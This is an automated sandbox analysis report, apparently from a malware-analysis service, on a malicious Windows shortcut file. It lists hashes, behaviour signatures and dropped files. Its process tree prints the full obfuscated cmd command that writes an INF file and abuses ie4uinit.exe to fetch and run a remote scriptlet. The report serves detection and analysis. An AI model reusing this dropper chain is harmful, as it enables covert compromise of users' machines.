Overview

overview

7

Static

static

1

Mark Qualman.lnk

windows7-x64

7

Mark Qualman.lnk

windows10-2004-x64

7

Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    23-08-2024 05:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Mark Qualman.lnk

  • Size

    5KB

  • MD5

    4a792636a97df1ddec0d4e54272ca177

  • SHA1

    038ef3af740407c9514b28e7aa8524bcf84b9bed

  • SHA256

    f115187143a80b062a4844dbd462ed183e374263eeea874780eb65775991da22

  • SHA512

    3beb9b7608a93757913cd7f31614f5cbdd9a0a6c7bb9ad9fa70cb7d498b8479f89bf46217f7ad70eb731ef933f627cc3e33599d275396ca69eda3b9e714909b7

  • SSDEEP

    96:8u5XtaRd9qmN5yYLhTrrfhbFKyVmZXj5kpYZuBPSk:8Mad9qm7yurdbFxaj5kpXF

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
    adwarespyware
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Mark Qualman.lnk"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2688
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /v /c (for %u in (s) do @set "Assets=%~u") && (for %q in (a) do @!Assets!et "Totals=%~q") && !Assets!et "Improvements=default" && (for %d in (c) do @!Assets!et "Someone=%~d") && !Assets!et "Occasions=d" && !Assets!et "Facts=si" && !Assets!et "Scholars=version" && !Assets!et "Appliances=settings" && !Assets!et "Proceeds=t" && !Assets!et "Truly=ure = " && !Assets!et "Belongs=ni" && !Assets!et "Arrow=e" && !Assets!et "Tattoo=$win" && !Assets!et "Moderators=." && !Assets!et "Plastics=a" && !Assets!et "Traditions=!Moderators!inf" && !Assets!et "Barrel=ieui!Belongs!t!Traditions!" && c!Plastics!ll !Assets!et "Cleaners=%!Totals!ppd!Plastics!ta%\micro!Assets!oft\" && s!Arrow!t "Officers=!Cleaners!!Barrel!" && (for %u in ("[!Scholars!]" "signat!Truly!!Tattoo!dows nt$" "[7E55D7]" "ieu%Quantities%!Traditions!" "[!Occasions!e!Assets!tinationdirs]" "!Improvements!destdir=11" "7E55D7=01" "[BCB]" "sc\" "ro%Weights%j,NI,%Umbrella%%Situate%%Situate%p%Racks%%Otherwise%%Otherwise%oshof!Moderators!markqualman!Moderators!%Produce%/jlghiht" "[s!Proceeds!ring!Assets!]" "Otherwise=/" "!Assets!ervicen!Totals!me=' '" "!Assets!hortsvcn!Totals!me=' '" "Umbrella=h" "Order=%time%" "Situate=t;Pencil" "Racks=:;Bones" "Quantities=i!Belongs!t" "Produce=com" "Weights=b;Unaware" "[!Improvements!in!Assets!tall.windows7]" "!Occasions!elfil!Arrow!s=7E55D7" "Un\" "Register\" "OCXs=BCB" ) do @e!Someone!ho %~u)>"!Officers!" && !Assets!et "Refers=ie4ui!Belongs!t.!Arrow!xe" && !Someone!all x!Someone!opy /Y /C /Q %win!Occasions!ir%\!Assets!ys!Proceeds!!Arrow!m32\!Refers! "!Cleaners!*" | !Assets!et Receivers04=Naive && !Assets!t!Totals!rt "" wmi!Someone! proce!Assets!s call !Someone!rea!Proceeds!e "!Cleaners!!Refers! -base!Appliances!" | !Assets!et "Receivers58=Stands Claim River Solid Twist Condos Meadow Cheers Weasel Luggage Gross Tanks Acquisitions Taste Gesture Version Referrals Fears Cameras Obtain Bullet Managers Medal Spots Commissions Dimensions Strips Checks Swarm Praise Increase Jeans Power Plants Colours Signs Possibilities Consensus Marine Investors Poverty Science"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2280
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\Admin\AppData\Roaming\microsoft\*" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:580
        • C:\Windows\system32\xcopy.exe
          xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\Admin\AppData\Roaming\microsoft\*"
          4⤵
            PID:3016
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" set Receivers04=Naive "
          3⤵
            PID:2716
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2872
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic process call create "C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2868
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" set "Receivers58=Stands Claim River Solid Twist Condos Meadow Cheers Weasel Luggage Gross Tanks Acquisitions Taste Gesture Version Referrals Fears Cameras Obtain Bullet Managers Medal Spots Commissions Dimensions Strips Checks Swarm Praise Increase Jeans Power Plants Colours Signs Possibilities Consensus Marine Investors Poverty Science""
            3⤵
              PID:2860
        • C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe
          C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe -basesettings
          1⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Drops file in Program Files directory
          • Drops file in Windows directory
          • Modifies Internet Explorer settings
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2892
          • C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe
            C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache
            2⤵
            • Executes dropped EXE
            PID:2628

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\wwwE246.tmp
          Filesize

          226B

          MD5

          ad93eaac4ac4a095f8828f14790c1f8c

          SHA1

          f84f24c4ca9d04485a0005770e3ef1ca30eede55

          SHA256

          729111c923821a7ad0bb23d1a1dea03edbf503cd8b732e2d7eb36cf88eaa0cac

          SHA512

          f561b98836233849c016227a3366fcf8449db662f21aecd4bd45eb988f6316212685ce7ce6e0461fb2604f664ed03a7847a237800d3cdca8ba23a41a49f68769

          Download Submit

        • C:\Users\Admin\AppData\Roaming\microsoft\ieuinit.inf
          Filesize

          482B

          MD5

          1b43723805198519577fdea0d9855ad7

          SHA1

          53cc83793d6a293f7465b69eaa3b3e369a5c43ec

          SHA256

          1932c95c64c3db6ad2d3355c47eb0c48aaca6cc220ceeeb39775dc0606fbeb88

          SHA512

          7743d340903626fc946fc5d980b5011b892b6582c2f97fffe290a07fef2c8785989ccedcf4cb864602ff377f21cf6a81e1046920e07e430762a93eb158ef77e5

          Download Submit

        • C:\Users\Admin\Favorites\Links\Web Slice Gallery.url
          Filesize

          134B

          MD5

          873c8643cbbfb8ff63731bc25ac9b18c

          SHA1

          043cbc1b31b9988d8041c3d01f71ce3393911f69

          SHA256

          c4ad21379c11da7943c605eadb22f6fc6f54b49783466f8c1f3ad371eb167466

          SHA512

          356b13b22b7b1717ded0ae1272b07f1839184e839132f3ab891b5d84421e375d4fc45158c291b46a933254f463c52d92574ce6b15c1402dfb00ee5d0a74c9943

          Download Submit

        • \Users\Admin\AppData\Roaming\Microsoft\ie4uinit.exe
          Filesize

          213KB

          MD5

          05018a4e76f1636efbb7dcb76900872a

          SHA1

          347c1802b5e28998b0db7d6ba51846a707574abb

          SHA256

          bb2af4a415e1bfad250c99b5df20b46090cc9db1387381648b7d0818792d2fce

          SHA512

          7ca7e05f277c58176080db24bc34e3d2491a1495dc19511dae24a95f558c8e420b02270590730d7c7fccf7d65cfbdf40bc1de12d3ce6b8b8655def2a285b9f94

          Download Submit